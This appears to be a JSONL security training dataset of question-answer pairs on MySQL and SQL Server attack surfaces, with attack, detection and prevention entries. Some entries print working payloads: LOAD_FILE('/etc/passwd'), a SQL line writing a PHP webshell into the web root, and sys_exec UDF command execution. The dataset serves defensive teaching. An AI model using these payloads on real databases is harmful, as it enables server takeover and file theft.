+{"id": "trtp-9ab597a13dcc", "instruction": "What indicators reveal malicious activity involving MySQL Default Accounts and Authentication?", "output": "Methods for detecting MySQL Default Accounts and Authentication attacks or anomalies:\n\n- Failed authentication attempts\n- Anonymous user connections\n- Remote root connection attempts\n- mysql.user access from non-admin accounts", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120380Z", "updated_at": "2025-12-17T19:35:42.120380Z"}
+{"id": "trtp-f949ea696588", "instruction": "What security controls mitigate MySQL Default Accounts and Authentication risks?", "output": "Security controls and preventive measures for MySQL Default Accounts and Authentication:\n\n- Run mysql_secure_installation\n- Set strong root password\n- Remove anonymous accounts\n- Disable remote root access\n\nDefault MySQL configurations are insecure. Root without password allows immediate database takeover. Anonymous accounts enable unauthorized access. mysql_secure_installation addresses common issues but is often skipped.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120392Z", "updated_at": "2025-12-17T19:35:42.120392Z"}
+{"id": "trtp-18199984cc4f", "instruction": "What is the syntax for MySQL Default Accounts and Authentication?", "output": "Example of MySQL Default Accounts and Authentication:\n\n```sql\n-- Check for passwordless root:\nSELECT user, host, authentication_string FROM mysql.user WHERE user='root';\n\n-- Remove anonymous users:\nDELETE FROM mysql.user WHERE user='';\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120402Z", "updated_at": "2025-12-17T19:35:42.120402Z"}
+{"id": "trtp-d2bacb402092", "instruction": "Describe MySQL FILE Privilege Abuse and its role in database security.", "output": "The FILE privilege allows reading and writing files on the server filesystem. Attackers with FILE privilege can read sensitive files like /etc/passwd or write webshells to web directories.\n\nSecurity Relevance: FILE privilege enables filesystem access through SQL. Combined with SQL injection, attackers can read configuration files, source code, and write backdoors. It's one of the most dangerous MySQL privileges.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.122969Z", "updated_at": "2025-12-17T19:35:42.122969Z"}
+{"id": "trtp-4d53c56dd49f", "instruction": "What elements make up MySQL FILE Privilege Abuse?", "output": "MySQL FILE Privilege Abuse consists of the following key components:\n\n- LOAD_FILE() function\n- INTO OUTFILE/DUMPFILE\n- secure_file_priv variable\n- FILE privilege grant\n- OS file permissions interaction", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.122989Z", "updated_at": "2025-12-17T19:35:42.122989Z"}
+{"id": "trtp-2ebf862ae5d4", "instruction": "From a security perspective, why should defenders understand MySQL FILE Privilege Abuse?", "output": "FILE privilege enables filesystem access through SQL. Combined with SQL injection, attackers can read configuration files, source code, and write backdoors. It's one of the most dangerous MySQL privileges.\n\nCommon attack vectors include:\n- Read /etc/passwd for user enumeration\n- Read application config files for credentials\n- Write webshell to web directory\n- Read MySQL data files directly", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.123004Z", "updated_at": "2025-12-17T19:35:42.123004Z"}
+{"id": "trtp-9cd3ae07168e", "instruction": "What are common attack techniques involving MySQL FILE Privilege Abuse?", "output": "Attack techniques involving MySQL FILE Privilege Abuse:\n\n- Read /etc/passwd for user enumeration\n- Read application config files for credentials\n- Write webshell to web directory\n- Read MySQL data files directly\n\nDefenders can detect these attacks by:\n- LOAD_FILE() calls in query logs\n- INTO OUTFILE/DUMPFILE usage\n- File creation in unusual directories", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.123018Z", "updated_at": "2025-12-17T19:35:42.123018Z"}
+{"id": "trtp-8049accb3011", "instruction": "What log entries indicate MySQL FILE Privilege Abuse attacks?", "output": "Methods for detecting MySQL FILE Privilege Abuse attacks or anomalies:\n\n- LOAD_FILE() calls in query logs\n- INTO OUTFILE/DUMPFILE usage\n- File creation in unusual directories\n- Unexpected file reads in audit logs", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.123029Z", "updated_at": "2025-12-17T19:35:42.123029Z"}
+{"id": "trtp-a6f9b37fb84f", "instruction": "What are best practices for preventing MySQL FILE Privilege Abuse?", "output": "Security controls and preventive measures for MySQL FILE Privilege Abuse:\n\n- Set secure_file_priv to restrict paths\n- Never grant FILE privilege to application accounts\n- Use AppArmor/SELinux to restrict MySQL file access\n- Monitor for FILE privilege usage\n\nFILE privilege enables filesystem access through SQL. Combined with SQL injection, attackers can read configuration files, source code, and write backdoors. It's one of the most dangerous MySQL privileges.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.123056Z", "updated_at": "2025-12-17T19:35:42.123056Z"}
+{"id": "trtp-5021c9f9d2fb", "instruction": "What does MySQL FILE Privilege Abuse look like in SQL?", "output": "Example of MySQL FILE Privilege Abuse:\n\n```sql\n-- Read file:\nSELECT LOAD_FILE('/etc/passwd');\n\n-- Write webshell:\nSELECT '<?php system($_GET[\"cmd\"]); ?>' INTO OUTFILE '/var/www/html/shell.php';\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-file-privilege-abuse", "license": "original", "retrieved_at": "2025-12-17T19:35:42.122939Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.123066Z", "updated_at": "2025-12-17T19:35:42.123066Z"}
+{"id": "trtp-ba33fff23278", "instruction": "Describe MySQL User-Defined Functions (UDF) and its role in database security.", "output": "MySQL UDFs allow loading shared libraries to extend functionality. Malicious UDFs can execute system commands, providing operating system access through SQL queries. UDF exploitation is a common privilege escalation technique.\n\nSecurity Relevance: UDF exploitation provides OS command execution through MySQL. Attackers upload malicious shared libraries and register them as functions. With SQL injection and FILE privilege, this leads to full server compromise.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125575Z", "updated_at": "2025-12-17T19:35:42.125575Z"}
+{"id": "trtp-29503d566695", "instruction": "What are the main parts of MySQL User-Defined Functions (UDF) that security teams should understand?", "output": "MySQL User-Defined Functions (UDF) consists of the following key components:\n\n- lib_mysqludf_sys library\n- CREATE FUNCTION for UDF registration\n- plugin_dir directory\n- sys_exec() function\n- Shared library loading", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125596Z", "updated_at": "2025-12-17T19:35:42.125596Z"}
+{"id": "trtp-80ed5fca9e7b", "instruction": "From a security perspective, why should defenders understand MySQL User-Defined Functions (UDF)?", "output": "UDF exploitation provides OS command execution through MySQL. Attackers upload malicious shared libraries and register them as functions. With SQL injection and FILE privilege, this leads to full server compromise.\n\nCommon attack vectors include:\n- Upload UDF library via INTO DUMPFILE\n- Register sys_exec function\n- Execute arbitrary OS commands\n- Establish reverse shell", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125610Z", "updated_at": "2025-12-17T19:35:42.125610Z"}
+{"id": "trtp-fd0af9ca6790", "instruction": "What threats are associated with MySQL User-Defined Functions (UDF)?", "output": "Attack techniques involving MySQL User-Defined Functions (UDF):\n\n- Upload UDF library via INTO DUMPFILE\n- Register sys_exec function\n- Execute arbitrary OS commands\n- Establish reverse shell\n\nDefenders can detect these attacks by:\n- CREATE FUNCTION statements\n- Files in plugin_dir\n- sys_exec or similar function calls", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125624Z", "updated_at": "2025-12-17T19:35:42.125624Z"}
+{"id": "trtp-4b213be3a948", "instruction": "How do you detect exploitation of MySQL User-Defined Functions (UDF)?", "output": "Methods for detecting MySQL User-Defined Functions (UDF) attacks or anomalies:\n\n- CREATE FUNCTION statements\n- Files in plugin_dir\n- sys_exec or similar function calls\n- Unusual process spawning from mysqld", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125635Z", "updated_at": "2025-12-17T19:35:42.125635Z"}
+{"id": "trtp-880e3a6a48e6", "instruction": "How do you defend against MySQL User-Defined Functions (UDF) attacks?", "output": "Security controls and preventive measures for MySQL User-Defined Functions (UDF):\n\n- Restrict plugin_dir permissions\n- Don't grant FILE privilege\n- Monitor for UDF creation\n- Use AppArmor to restrict mysqld\n\nUDF exploitation provides OS command execution through MySQL. Attackers upload malicious shared libraries and register them as functions. With SQL injection and FILE privilege, this leads to full server compromise.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125648Z", "updated_at": "2025-12-17T19:35:42.125648Z"}
+{"id": "trtp-ae3c9c043b7a", "instruction": "Provide a code example for MySQL User-Defined Functions (UDF).", "output": "Example of MySQL User-Defined Functions (UDF):\n\n```sql\n-- Create malicious UDF:\nCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';\n\n-- Execute command:\nSELECT sys_exec('id > /tmp/pwned.txt');\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-user-defined-functions-udf", "license": "original", "retrieved_at": "2025-12-17T19:35:42.125543Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.125659Z", "updated_at": "2025-12-17T19:35:42.125659Z"}
+{"id": "trtp-7d14cdb9d002", "instruction": "What is MySQL Information Schema Enumeration and why is it important for database security?", "output": "MySQL's information_schema database contains metadata about all databases, tables, columns, and privileges. Attackers use this for reconnaissance during SQL injection to map the database structure.\n\nSecurity Relevance: Information_schema enables attackers to enumerate the entire database structure without guessing. It reveals table names, column names, and data types - essential for crafting effective injection payloads.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127414Z", "updated_at": "2025-12-17T19:35:42.127414Z"}
+{"id": "trtp-787d288c103a", "instruction": "What elements make up MySQL Information Schema Enumeration?", "output": "MySQL Information Schema Enumeration consists of the following key components:\n\n- information_schema.tables\n- information_schema.columns\n- information_schema.schemata\n- information_schema.user_privileges\n- information_schema.processlist", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127434Z", "updated_at": "2025-12-17T19:35:42.127434Z"}
+{"id": "trtp-2e17ab9f8264", "instruction": "Why is MySQL Information Schema Enumeration important for database security?", "output": "Information_schema enables attackers to enumerate the entire database structure without guessing. It reveals table names, column names, and data types - essential for crafting effective injection payloads.\n\nCommon attack vectors include:\n- UNION SELECT from information_schema\n- Database enumeration via schemata\n- Table discovery via tables\n- Column enumeration for injection crafting", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127448Z", "updated_at": "2025-12-17T19:35:42.127448Z"}
+{"id": "trtp-14a1a707627e", "instruction": "How can adversaries exploit MySQL Information Schema Enumeration?", "output": "Attack techniques involving MySQL Information Schema Enumeration:\n\n- UNION SELECT from information_schema\n- Database enumeration via schemata\n- Table discovery via tables\n- Column enumeration for injection crafting\n\nDefenders can detect these attacks by:\n- Queries against information_schema\n- Multiple schema enumeration queries\n- Unusual metadata access patterns", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127463Z", "updated_at": "2025-12-17T19:35:42.127463Z"}
+{"id": "trtp-1410a79242ec", "instruction": "What should analysts look for when monitoring for MySQL Information Schema Enumeration?", "output": "Methods for detecting MySQL Information Schema Enumeration attacks or anomalies:\n\n- Queries against information_schema\n- Multiple schema enumeration queries\n- Unusual metadata access patterns\n- information_schema in injection payloads", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127484Z", "updated_at": "2025-12-17T19:35:42.127484Z"}
+{"id": "trtp-e44981be6dc7", "instruction": "What preventive measures address MySQL Information Schema Enumeration vulnerabilities?", "output": "Security controls and preventive measures for MySQL Information Schema Enumeration:\n\n- Limit information_schema access where possible\n- Monitor for enumeration patterns\n- Parameterized queries prevent injection\n- Consider column-level permissions\n\nInformation_schema enables attackers to enumerate the entire database structure without guessing. It reveals table names, column names, and data types - essential for crafting effective injection payloads.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127498Z", "updated_at": "2025-12-17T19:35:42.127498Z"}
+{"id": "trtp-830d9640edea", "instruction": "What is the syntax for MySQL Information Schema Enumeration?", "output": "Example of MySQL Information Schema Enumeration:\n\n```sql\n-- List databases:\nSELECT schema_name FROM information_schema.schemata;\n\n-- List tables:\nSELECT table_name FROM information_schema.tables WHERE table_schema='target_db';\n\n-- List columns:\nSELECT column_name, data_type FROM information_schema.columns WHERE table_name='users';\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-information-schema-enumeration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.127385Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.127508Z", "updated_at": "2025-12-17T19:35:42.127508Z"}
+{"id": "trtp-89cc4e21c119", "instruction": "Describe MySQL Binary Logging and Replication Security and its role in database security.", "output": "MySQL binary logs record all data modifications and are used for replication and point-in-time recovery. Binary logs may contain sensitive data including passwords. Replication involves privileged connections between servers.\n\nSecurity Relevance: Binary logs may expose sensitive data to anyone with file access. Replication credentials are high-value targets. Compromising replication can lead to data manipulation across multiple servers.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129221Z", "updated_at": "2025-12-17T19:35:42.129221Z"}
+{"id": "trtp-605cb6acb124", "instruction": "What are the main parts of MySQL Binary Logging and Replication Security that security teams should understand?", "output": "MySQL Binary Logging and Replication Security consists of the following key components:\n\n- Binary log files\n- REPLICATION SLAVE privilege\n- Master-slave connections\n- binlog_format settings\n- mysqlbinlog utility", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129240Z", "updated_at": "2025-12-17T19:35:42.129240Z"}
+{"id": "trtp-613e80415b4e", "instruction": "Why is MySQL Binary Logging and Replication Security important for database security?", "output": "Binary logs may expose sensitive data to anyone with file access. Replication credentials are high-value targets. Compromising replication can lead to data manipulation across multiple servers.\n\nCommon attack vectors include:\n- Binary log file access for credential theft\n- Replication credential compromise\n- Injecting malicious statements via replication\n- Data theft through binary log parsing", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129255Z", "updated_at": "2025-12-17T19:35:42.129255Z"}
+{"id": "trtp-9153becf5b67", "instruction": "How do attackers abuse MySQL Binary Logging and Replication Security?", "output": "Attack techniques involving MySQL Binary Logging and Replication Security:\n\n- Binary log file access for credential theft\n- Replication credential compromise\n- Injecting malicious statements via replication\n- Data theft through binary log parsing\n\nDefenders can detect these attacks by:\n- Binary log file access outside normal operations\n- Unauthorized replication connections\n- binlog configuration changes", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129269Z", "updated_at": "2025-12-17T19:35:42.129269Z"}
+{"id": "trtp-a6bda963c3e1", "instruction": "What indicators reveal malicious activity involving MySQL Binary Logging and Replication Security?", "output": "Methods for detecting MySQL Binary Logging and Replication Security attacks or anomalies:\n\n- Binary log file access outside normal operations\n- Unauthorized replication connections\n- binlog configuration changes\n- mysqlbinlog execution", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129280Z", "updated_at": "2025-12-17T19:35:42.129280Z"}
+{"id": "trtp-1422a8e2ad01", "instruction": "What preventive measures address MySQL Binary Logging and Replication Security vulnerabilities?", "output": "Security controls and preventive measures for MySQL Binary Logging and Replication Security:\n\n- Secure binary log file permissions\n- Encrypt replication connections (SSL)\n- Strong replication passwords\n- Limit REPLICATION privilege\n\nBinary logs may expose sensitive data to anyone with file access. Replication credentials are high-value targets. Compromising replication can lead to data manipulation across multiple servers.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129292Z", "updated_at": "2025-12-17T19:35:42.129292Z"}
+{"id": "trtp-a5a71d77e448", "instruction": "What is the syntax for MySQL Binary Logging and Replication Security?", "output": "Example of MySQL Binary Logging and Replication Security:\n\n```sql\n-- View binary log events:\nSHOW BINARY LOGS;\nSHOW BINLOG EVENTS IN 'mysql-bin.000001';\n\n-- Parse binary log:\nmysqlbinlog mysql-bin.000001\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-binary-logging-and-replication-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.129191Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.129302Z", "updated_at": "2025-12-17T19:35:42.129302Z"}
+{"id": "trtp-e318099dba19", "instruction": "What is SQL Server xp_cmdshell and why is it important for database security?", "output": "xp_cmdshell is a SQL Server extended stored procedure that executes operating system commands. It's the most direct path from SQL injection to OS command execution in MSSQL environments.\n\nSecurity Relevance: xp_cmdshell provides direct OS command execution through SQL. Attackers with sufficient privileges can enable it if disabled, then execute arbitrary commands. It's a critical attack vector in SQL injection.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131152Z", "updated_at": "2025-12-17T19:35:42.131152Z"}
+{"id": "trtp-72b6bc020db5", "instruction": "What elements make up SQL Server xp_cmdshell?", "output": "SQL Server xp_cmdshell consists of the following key components:\n\n- xp_cmdshell extended procedure\n- sp_configure for enabling\n- CONTROL SERVER permission\n- Command output capture\n- show advanced options setting", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131171Z", "updated_at": "2025-12-17T19:35:42.131171Z"}
+{"id": "trtp-8154e64c9f13", "instruction": "Why is SQL Server xp_cmdshell important for database security?", "output": "xp_cmdshell provides direct OS command execution through SQL. Attackers with sufficient privileges can enable it if disabled, then execute arbitrary commands. It's a critical attack vector in SQL injection.\n\nCommon attack vectors include:\n- Enable and execute OS commands\n- Establish reverse shells\n- Download and execute malware\n- Access network resources", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131186Z", "updated_at": "2025-12-17T19:35:42.131186Z"}
+{"id": "trtp-e8bf181f2915", "instruction": "What attacks exploit SQL Server xp_cmdshell?", "output": "Attack techniques involving SQL Server xp_cmdshell:\n\n- Enable and execute OS commands\n- Establish reverse shells\n- Download and execute malware\n- Access network resources\n\nDefenders can detect these attacks by:\n- sp_configure changes for xp_cmdshell\n- xp_cmdshell execution events\n- Unusual process spawning from sqlservr.exe", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131199Z", "updated_at": "2025-12-17T19:35:42.131199Z"}
+{"id": "trtp-391736a4e15f", "instruction": "What should analysts look for when monitoring for SQL Server xp_cmdshell?", "output": "Methods for detecting SQL Server xp_cmdshell attacks or anomalies:\n\n- sp_configure changes for xp_cmdshell\n- xp_cmdshell execution events\n- Unusual process spawning from sqlservr.exe\n- Command execution audit events", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131210Z", "updated_at": "2025-12-17T19:35:42.131210Z"}
+{"id": "trtp-08a75e77773d", "instruction": "What security controls mitigate SQL Server xp_cmdshell risks?", "output": "Security controls and preventive measures for SQL Server xp_cmdshell:\n\n- Keep xp_cmdshell disabled\n- Alert on sp_configure changes\n- Restrict CONTROL SERVER permission\n- Monitor for enablement attempts\n\nxp_cmdshell provides direct OS command execution through SQL. Attackers with sufficient privileges can enable it if disabled, then execute arbitrary commands. It's a critical attack vector in SQL injection.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-xp_cmdshell", "license": "original", "retrieved_at": "2025-12-17T19:35:42.131123Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.131222Z", "updated_at": "2025-12-17T19:35:42.131222Z"}
